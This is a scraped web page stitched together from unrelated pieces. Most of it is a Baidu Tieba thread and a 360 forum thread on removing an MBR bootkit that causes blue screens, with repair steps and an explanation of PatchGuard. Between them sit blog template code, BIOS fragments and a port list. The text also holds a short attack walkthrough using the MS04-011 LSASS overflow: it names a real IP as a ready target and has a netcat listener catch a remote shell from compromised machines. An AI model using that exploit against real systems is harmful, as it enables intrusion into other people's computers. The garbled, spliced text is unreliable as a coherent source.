【04-11】解决木马导致的蓝屏（CRITICAL_STRUCTURE_CORRUPTION）【win10吧】_百度贴吧
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&签到排名：今日本吧第个签到，本吧因你更精彩，明天继续来努力！
本吧签到人数：0成为超级会员，使用一键签到本月漏签0次！成为超级会员，赠送8张补签卡连续签到：天&&累计签到：天超级会员单次开通12个月以上，赠送连续签到卡3张
关注：440,114贴子：
【04-11】解决木马导致的蓝屏（CRITICAL_STRUCTURE_CORRUPTION）收藏
在一台机器上找到了MBR BOOTKIT类型的木马，现在已经尝试清除，正在观察中。这个木马在UEFI（尤其是开启SecureBoot时）下无法工作。如果可能的话，建议大家改用UEFI引导，开启SecureBoot。LZ尝试的手动清除方法，不保证一定有效，慎用：首先，需要恢复内核中的ATAPI HOOK才能正常检测MBR。否则，软件报告正常也是假的。1.百度搜索PCHunter（目前第一个是官方链接），下载，运行PCHunter64.exe。2.转到“内核”-“DPC定时器”，多刷新几次，可以发现有一个红色的“未知模块”项目。右键点红色项目，点取消，删掉它。3.转到“内核钩子”-“ATAPI”，应该有一个红色“未知模块”的项目，右键点恢复。恢复MBR方法很多，需要先进WinPE，或者先按照上述步骤恢复ATAPI HOOK：1.可以用BOOTICE这个小工具（可以去作者iPauly的博客下载），选择硬盘（别选错）后，点“主引导记录”，选NT 6.X，安装。2.DiskGenius软件也有重建MBR的功能。3.还可以先以管理员身份运行命令提示符（WIN+X菜单里有），输入命令bootsect /nt60 C: /force /mbr为了防止木马在关机时再生，LZ用了PCHunter的强制重启功能。在PCHunter中转到“配置”，点“更暴力的强制重启”即可立即断电重启。
在线安装win10只需三步即可完成!免激活,集成万能驱动,兼容各类电脑实现一键装机!
因为感染了MBR，每次开机，恶意代码都会在系统启动前执行，所以重置系统时也会蓝屏、手动选择进了WinRE也照样会蓝屏。
就算用本贴方法成功了，为了防止木马清除不干净，还是建议你重装系统，同时改用UEFI引导，并开启SecureBoot。操作要点：1.搜索media creation tool，用微软官方的工具制作Win10安装U盘。2.下载傲梅分区助手有WinPE版，把它解压到Win10安装U盘中。3.进入BIOS设置，修改引导模式为UEFI，开启SecureBoot。4.使用Win10安装U盘启动，开始安装前，启动傲梅分区助手。操作大致如下：按SHIFT+F10，输入notepad，打开记事本，然后利用记事本的“打开”对话框，（对话框下方先选择“文件类型”为“所有文件”）找到傲梅分区助手，右键以管理员身份运行（别双击，双击了记事本就把它当文本文件打开了）。5.使用傲梅分区助手，右键点你的硬盘（一般是磁盘0），转换分区表格式到GPT。别忘了点“提交”生效！6.正常开始安装，如果碰到问题，请删除C盘（数据会丢失）或系统分区
LZ并不是专业人士……不过强行科普大概也比没有科普要强？这波蓝屏是PatchGuard触发的。PatchGuard，正名Kernel Patch Protection，是Windows内核的一种安全特性。计算机世界的规矩是：操作系统可以直接访问硬件，应用程序就不行。比如读取磁盘时，系统内核中的代码是必经之路——所以劫持了这条必经之路，就可以欺上瞒下，达到某种不可告人的目的（大神别笑……我已经不知道自己在说什么了）这波蓝屏中，木马通过修改函数调用地址的方法，让内核中正常的磁盘读取操作跳转到恶意代码中。这样一来，各种安全工具就察觉不到MBR被篡改了（读取MBR时，恶意代码拦截到这个请求，返回正常的数据来欺骗安全工具）。微软不会眼看着Windows就这么被玩坏……他们给Windows加了一套很猥琐的机制，就是PatchGuard。PatchGuard的代码藏在内核里，各种正常思路想不到的地方，用了各种蛋疼猥琐的手段来避免被绕过。大动干戈的目的只有一个：让Windows长个心眼，时不时照照镜子看看（应该是不断计算checksum然后比对），看看脸上是不是被画了大油花脸，或者胳膊是不是被替换成机械臂了（检查代码是不是被篡改、Hook）……如果Windows发现自己不对劲了，措施很简单——自杀殉国（蓝屏死机）。很粗暴？不，很猥琐。因为正常手段无法确定这个检查什么时候会发生、预测不了什么时候会蓝屏死机，所以思路正常的程序员就搞不定PatchGuard，只能乖乖放弃Hook——已经没人会在正常的软件和硬件驱动里用Patch内核实现的Hook技术了。思路猥琐的黑客研究一番，还是可以搞定这个玩意儿的……不过他们可能不会随便公开绕过方法，因为微软会不断更新PatchGuard的实现，也许哪天微软搞个KB一推送，以前的绕过方法就挂了。对我们用户来说，现象只有系统毫无征兆，突然就蓝屏猝死了这波蓝屏的代码多是形如BugCheck 109, {a3a0XXXXXXXXXXXX, 0, 0, 108}的形式，奇怪的地方在于第四个参数是108，微软MSDN查不到对应的篡改类型。不知道有没有大牛了解这个代码的意义？总之，Windows是如何察觉到自己被插♂入的？这仍然是个谜……PS：Win10的PatchGuard比Win7管得更宽。同样的Hook，可能Win7不蓝，Win10会蓝。所以，装Win7就不再蓝屏的吧友们，如果你没有在WinPE下重写MBR，那么……额，我也不确定会发生什么，但愿你装系统时已经把MBR顺手重写了吧。PPS：LZ以为这两年已经没人搞MBR BOOTKIT了（实际上还是LZ太naive），再加上LZ本人、身边都没有发现有这种蓝屏现象，只是有网友碰到这个蓝屏，远程指zhuang导B实在不便，所以折腾了很久才开始往MBR BOOTKIT方面怀疑，然后才发现不对劲……
PatchGuard目前只在64位Windows上被强制执行。32位Windows目前还是无法无天的状况……我记得连Process Monitor这种“正规”的工具都Hook掉了SSDT中的某些函数
强行科普完PatchGuard、安利完UEFI和SecureBoot，LZ再提醒一下各位：使用UEFI引导、开启SecureBoot可以免疫MBR BOOTKIT，不过并不是开了SecureBoot就高枕无忧了。（实际上……经过了Secure Golden Key Boot事件，SecureBoot也可以说不可靠了，而且网上似乎可以搜到现成的UEFI BOOTKIT源码）至少，通过加载驱动实现的Rootkit仍然可以在Windows上横行——只需要搞到管理员特权或者利用内核中的漏洞，Rootkit就可以安家了……说不定它现在就躺在LZ的电脑内存里，默默记录着LZ装B的过程，LZ自己却没意识到
好像是这样 之前不小心我也下了个全家桶 然后无限蓝屏 我固态是系统盘 机械放了东西我格式化了固态再重新分了固态盘 再重做了win10这样能解决么楼主
你没有再蓝屏了吧
出现蓝屏，实际上是木马作者玩脱了。那么，如果作者没玩脱呢？LZ只能说一句，请时刻保持安全意识……虽然LZ自己也不能保证100%不会中招。另外，PCHunter也不是万能的。举个例子……据LZ的脑补，使用虚拟化技术（Intel VT-x或AMD-V）实现的Hook就可以做到让PCHunter这类软件无法检测到系统被做了手脚。
win10下载站免费提供 XP win7 win8 win10原版系统,win10集成万能驱动 一键快速安装 203项优化 安全无冗余!
未知模块找到也取消了，但是atapi里没有
PowerTool还是好使的不过好像没自带NT6的MBR，不能直接修复……
今个下午不知道什么情况打开电脑就一直蓝屏崩溃
大概5分钟左右一次
完全不知道该如何操作
代码是相同的 求大神指点
目前Win7、Win8的PatchGuard好像已经有公开破解了。有系统启动前修改掉PatchGuard初始化函数、系统启动后动态修改让PatchGuard默不作声两种。
最好改用UEFI启动吧。
目前没有重建MBR再蓝屏的。
今天不知道下了什么软件目前是能开机用一会又这样了
直接重装系统可以么
用楼主大大的方法已经解决问题了~ 目前未发生蓝屏
在DPC定时器里每次蓝屏重启就会出现两个未知模块，然后取消删除后再内核钩子里的ATAPI和SCSI里都找不到
刚勇BOOTICE
修复了 mbr
有几分钟没蓝了，再等等看
MBR病毒？？360急救箱分分钟搞定
这是最后一次蓝屏代码！
本来是上面这张图 后来换成下面这张图的错误代码了是咋回事啊
楼主是不是这玩意？
换硬盘直接彻底根除
楼主我没一直蓝屏就是更新的时候总失败，然后就蓝屏了，然后能回退到以前的系统，但是就是更新成功不了易升，ISO都试了
360系统急救箱昨天更新了。用虚拟机测试，先勾选强力模式扫描（扫描时间很长，为防止蓝屏中断扫描，可以先点停止），然后按提示重启可以恢复正常的MBR。大家可以试试。
登录百度帐号推荐应用温馨提示！由于新浪微博认证机制调整，您的新浪微博帐号绑定已过期，请重新绑定！&&|&&
this.p={b:2,s:2,a:true};
{if !defined('ml')||!ml.length} 专辑 ${an|escape} 没有音乐！ {else} {list ml as x}{/list} {/if}
{if !defined('ll')||!ll.length} 网易博客音乐盒 {else} {list ll as x}${x.v|default:'&'}{/list} {/if}
{if !defined('al')||!al.length} 没有专辑！ {else} {list al as x}{/list} {/if}
博友列表加载中...
this.p={b:2,m:0};
模块内容加载中...
this.p={b:2,c:'57083',r:'http://b.bst.126.net/common/weather/'};
{if defined('w')} ${w.province}{if w.province!=w.cityName}，${w.cityName}{/if}
{var ne = w.weatherFromCode!=w.weatherToCode}
{if ne}{/if}
今:${w.temperatureLow}℃~${w.temperatureHigh}℃
{var ne = w.weatherFromCode48!=w.weatherToCode48}
{if ne}{/if}
明:${w.temperatureLow48}℃~${w.temperatureHigh48}℃
{else} 天气服务器当前不可用！ {/if}
& 日志里的文章全是在网上收集而来，为的是方便大家浏览！~呵呵``多多支持哈！！ &
最后登录加载中...
this.p={b:2,ua:30, ub:'http://img.bimg.126.net/photo/iG5IuD0OznI8_qg_rRCfKQ==/9282599.jpg',us:'他', friendstatus:'none',followstatus:'unFollow',hmcon:'',aShowT:'0',guideId:0};
积分 ${data.totalScore} 分，距离下一等级还有 ${data.nextGradeNeedScore}分
心情随笔列表加载中...
this.p={b:2,n:5,r:'http://xiaohulove00./blog/#m=1&c=',mset:'000',mcon:'',srk:-100};
{if defined('fl')&&fl.length>0} {list fl as x}
${x.content|xescape:x.id,x.moveFrom} ${x.publishTime|xtime}
{if x.moveFrom&&x.moveFrom=='wap'} && {/if} {if x.moveFrom&&x.moveFrom=='mobile'} && {/if}
{/list} {else} 暂无心情随笔记录！ {/if}
模块内容加载中...
this.p={b:2,maxb:5,maxp:6}
{if !defined('b')} 日志更新列表加载中... {elseif !b.length} 没有日志更新！ {else} {list b as x}·{/list} {/if}
{if !defined('p')} 相片更新列表加载中... {elseif !p.length} 没有相片更新！ {else} {list p as x}{/list} {/if}
{list 0..6 as x}${dv[x]}{/list} {list 1..6 as x}{list 1..7 as y}{/list}{/list}
{list df..dt as x}{/list}
我要留言 & &
& 留言列表加载中...
this.p={b:2,nv:false,cn:5,ct:5};
"蓝屏"现象多和内存大小、CPU频率、光驱、硬盘碎片等等关系密切......在计算机的使用过程中，经常会遇到蓝屏的情况。对于初学者来讲，好象就是一场电脑灾难一样，不知所措。其实只要了解了原因之后就不用怕了。造成计算机蓝屏的原因有很多种，硬件方面的原因总体可以概括为以下几种：
一、屏幕显示系统忙，请按任意键继续……
1、虚拟内存不足造成系统多任务运算错误
虚拟内存是WINDOWS系统所特有的一种解决系统资源不足的方法，其一般要求主引导区的硬盘剩余空间是其物理内存的2-3倍。而一些发烧友为了充分利用空间，将自己的硬盘塞到满满的，忙记了WI
AWARD BIOS
AWARD BIOS是目前应用最为广泛的一种BIOS。本文将详细介绍一下AWARD BIOS中的有关设置选项的含义和设置方法，在AWARD BIOS的主菜单中主要有以下几个菜单项：
Standard CMOS Setup（标准CMOS设定）： 这个选项可以设置系统日期、时间、IDE设备、软驱A与B、显示系统的类型、错误处理方法等。 （1）在IDE设备设置中，用户可以在Type（类型）和Mode（模式）项设为Auto，使每次启动系统时BIOS自动检测硬盘。也可以在主菜单中的IDE HDD Auto Detection操作来设置。用户还可以使用User选项，手动设定硬盘的参数。必须输入柱面数（Cyls），磁头数（Heads），写预补偿（Precomp），磁头着陆区（Landz），每柱面扇区数（Sectorxs），工作模式（Mode）等几种参数。硬盘大小在上述参数设定后自动产生。
&&&&&&&&&&&&&&&&&&&&&&&&&& FDISK MBR 命令是什麽& 有何作用?&&& 除了那些具有从非物理 C盘启动选项的PC外，任何一个PC都无法从物理第一硬盘的{0，0，1}以外的任何一个扇区启动，所以{0，0，1}被称为主引导记录即：MBR（Main Boot Record）。 修改 MBR 的病毒或程序把原 MBR 移动到其他扇区后，这个程序就不能再称为 MBR 了，充其量称为“原MBR”，而占据{0，0，1}的新引导程序才能称为当前的 MBR.修改 B
can.exe&&&&& 扫描程序g.exe&&&&&&& 检测系统类型m.exe&&&&&&& 溢出程序nc.exe&&&&&& 监听端口(瑞士军刀) Windows Lsasrv.dll RPC [ms04011] buffer overflow Remote Exploit m.exe 系统类型（0或者1） 对方ip 你监听断口 你的ip 前提要你的机子要公网ip。或者你也可以用3389登入肉鸡，进行溢出。 第一步扫描：&&&&& scan.exe& 出现VULNERABLE就是可以益出 ，现成的节约时间218.5.67.154。 第二步用：&&&&&&& g.exe 察看系统类型 第三步监听本地端口：nc -vv -l -p 1234 第步溢出：m.exe
1 传输控制协议端口服务多路开关选择器2 compressnet 管理实用程序3 压缩进程5 远程作业登录7 回显(Echo)9 丢弃11 在线用户13 时间15 netstat17 每日引用18 消息发送协议19 字符发生器20 文件传输协议(默认数据口)21 文件传输协议(控制)22 SSH远程登录协议23 telnet 终端仿真协议24 预留给个人用邮件系统25 smtp 简单邮件发送协议27 NSW 用户系统现场工程师29 MSG　ICP31 MSG验证33 显示支持协议35 预留给个人打印机服务37 时间38 路由访问协议39 资源定位协议
& & & & & &
网易公司版权所有&&
{list x.l as y}
{/list} {/list}
{if defined('wl')} {list wl as x}{/list} {/if}系统中了MBR引导区顽固木马，怎么杀都杀不掉_360社区
绑定手机号
应国家法规对于账号实名的要求，请您在进行下一步操作前，需要先完成手机绑定 (若绑定失败，请重新登录绑定)。
不绑定绑定手机号
应国家法规对于账号实名的要求，如不绑定手机号，则只能浏览论坛，无法进行发帖、评论、回复、点赞等相关操作 (若绑定失败，请重新登录绑定)。
确定绑定手机号
反馈360产品问题，
这几天被折腾死了，系统中了MBR引导区顽固木马，无数次删除，无数次蓝屏开不了机，重装系统，读不到MBR引导文件，还弄坏我一个主板，又买了个二手的主板，装系统又中了，到电脑维修点，低格硬盘，修复MBR在装系统还是不行，好不容易装好一个WIN7，360扫到引导区木马清楚，结果悲剧直接蓝屏，连安全模式启动都蓝屏，重装系统又找不到引导文件。。。。肿么破，求求各位了
产品答疑师
您可以先进入360安全卫士—人工服务里面，输入&蓝屏修复&试一下，谢谢！
问题已解决。感谢大家
LV1.上等兵
玛德琳Love 发表于
您可以先进入360安全卫士—人工服务里面，输入&蓝屏修复&试一下，谢谢！ ...
根本就修复不了，我试过
kissing成 发表于
根本就修复不了，我试过
您好,您的mbr杀不掉么,& &加我QQ 看看是什么原因
尼姑拉迪诺 发表于
问题已解决。感谢大家
怎么解决的？
我的电脑也一样，扫描后检测到MBR(nowrite)这一高危风险项，可删除后重启再扫还是有，用了蓝屏检测修复也没用，用了金山毒霸也删除不了，试过好多方法都不行。真是烦还了，电脑时常会出现蓝屏和显示器闪屏后死机现象，重装过系统多次没用。
<font color="#157738 发表于
我的电脑也一样，扫描后检测到MBR(nowrite)这一高危风险项，可删除后重启再扫还是有，用了蓝屏检测修复也没 ...
您好,请使用360系统急救箱 , 打开360系统急救箱, 点击下方有个&引导区顽固木马(鬼影,魅影,魔影)专杀&工具,&&试试能不能杀掉.如果还杀不掉,请加我QQ 看看
恶意软件(MBR(nowrite))
恶意软件是对病毒、木马、蠕虫、后门程序等危害用户计算机及数据安全的有害软件的统称。危害较大。
扫描引擎：
360云查杀引擎
dpBird2012 发表于
您好,请使用360系统急救箱 , 打开360系统急救箱, 点击下方有个&引导区顽固木马(鬼影,魅影,魔影)专杀&工具 ...
删除后重启了又是一样
热门推荐最新主帖
360社区客户端下载}